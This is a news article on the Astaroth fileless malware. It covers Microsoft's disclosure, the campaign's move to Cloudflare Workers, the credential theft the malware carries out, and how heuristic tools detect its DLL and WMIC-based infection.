Microsoft recently lifted the veil on how one very unpleasant fileless malware that works to steal data without ever having to be installed on a victim's machine – Astaroth.
The recent published report by the Microsoft Research team that opened the lid on the activities of the Astaroth fileless malware forced the threat actors behind it to change their tactics. They ran a new campaign in August with a few notable changes, specifically using Cloudflare Workers.
Named after a demon of the same name straight from the occult books 'Ars Goetia' and 'The Key of Solomon', said to seduce his victims through vanity and laziness, this malware has been in circulation ever since 2017. Moreover, the threat is dubbed as the 'Great Duke of Hell' malware attack. It was mostly used to steal data from South American and European companies in targeted attacks that used spear phishing as a point of entry.
There is something that makes this specific infection unique, according to Microsoft Defender APT's researcher Andrea Lelli, as it has the ability to stealthily infiltrate under the detection methods of some traditional antivirus programs.
According to Lelli, Astaroth is notorious for information stealing of personal credentials, keylogging and more, data which is then exfiltrated to a remote server. The attackers then use the data for financial theft, selling personal information to other criminals or even moving laterally across networks.
How Astaroth Infects Systems
The procedure works well against signature-based detection tools, since nothing but the DLL files gets downloaded or installed. This makes it so there is little chance to scan and catch the attack in the process. This approach allowed Astaroth to fly under the radar and thrive online ever since the late days of 2017 without the usual reliance on trojan downloaders or any vulnerability exploits.
Fileless Malware Detection Measures
According to Lelli, the traditional file-centric antivirus solutions have only one chance to detect the attack – during the download of the two DLL files, since the executable used in the attack is considered non-malicious. The DLLs use code obfuscation and they vary between campaigns, which means focusing on detection of those two would be 'a vicious trap', Lelli added.
Microsoft and other vendors had to rely on heuristic detection tools, such as those who closely watch for the use of WMIC command line code, applying the rules when any loading of DLL files happens. Checking the age of the file, blocking newly created DLLs from running and similar tactics allows newer security tools to catch up to fileless malware.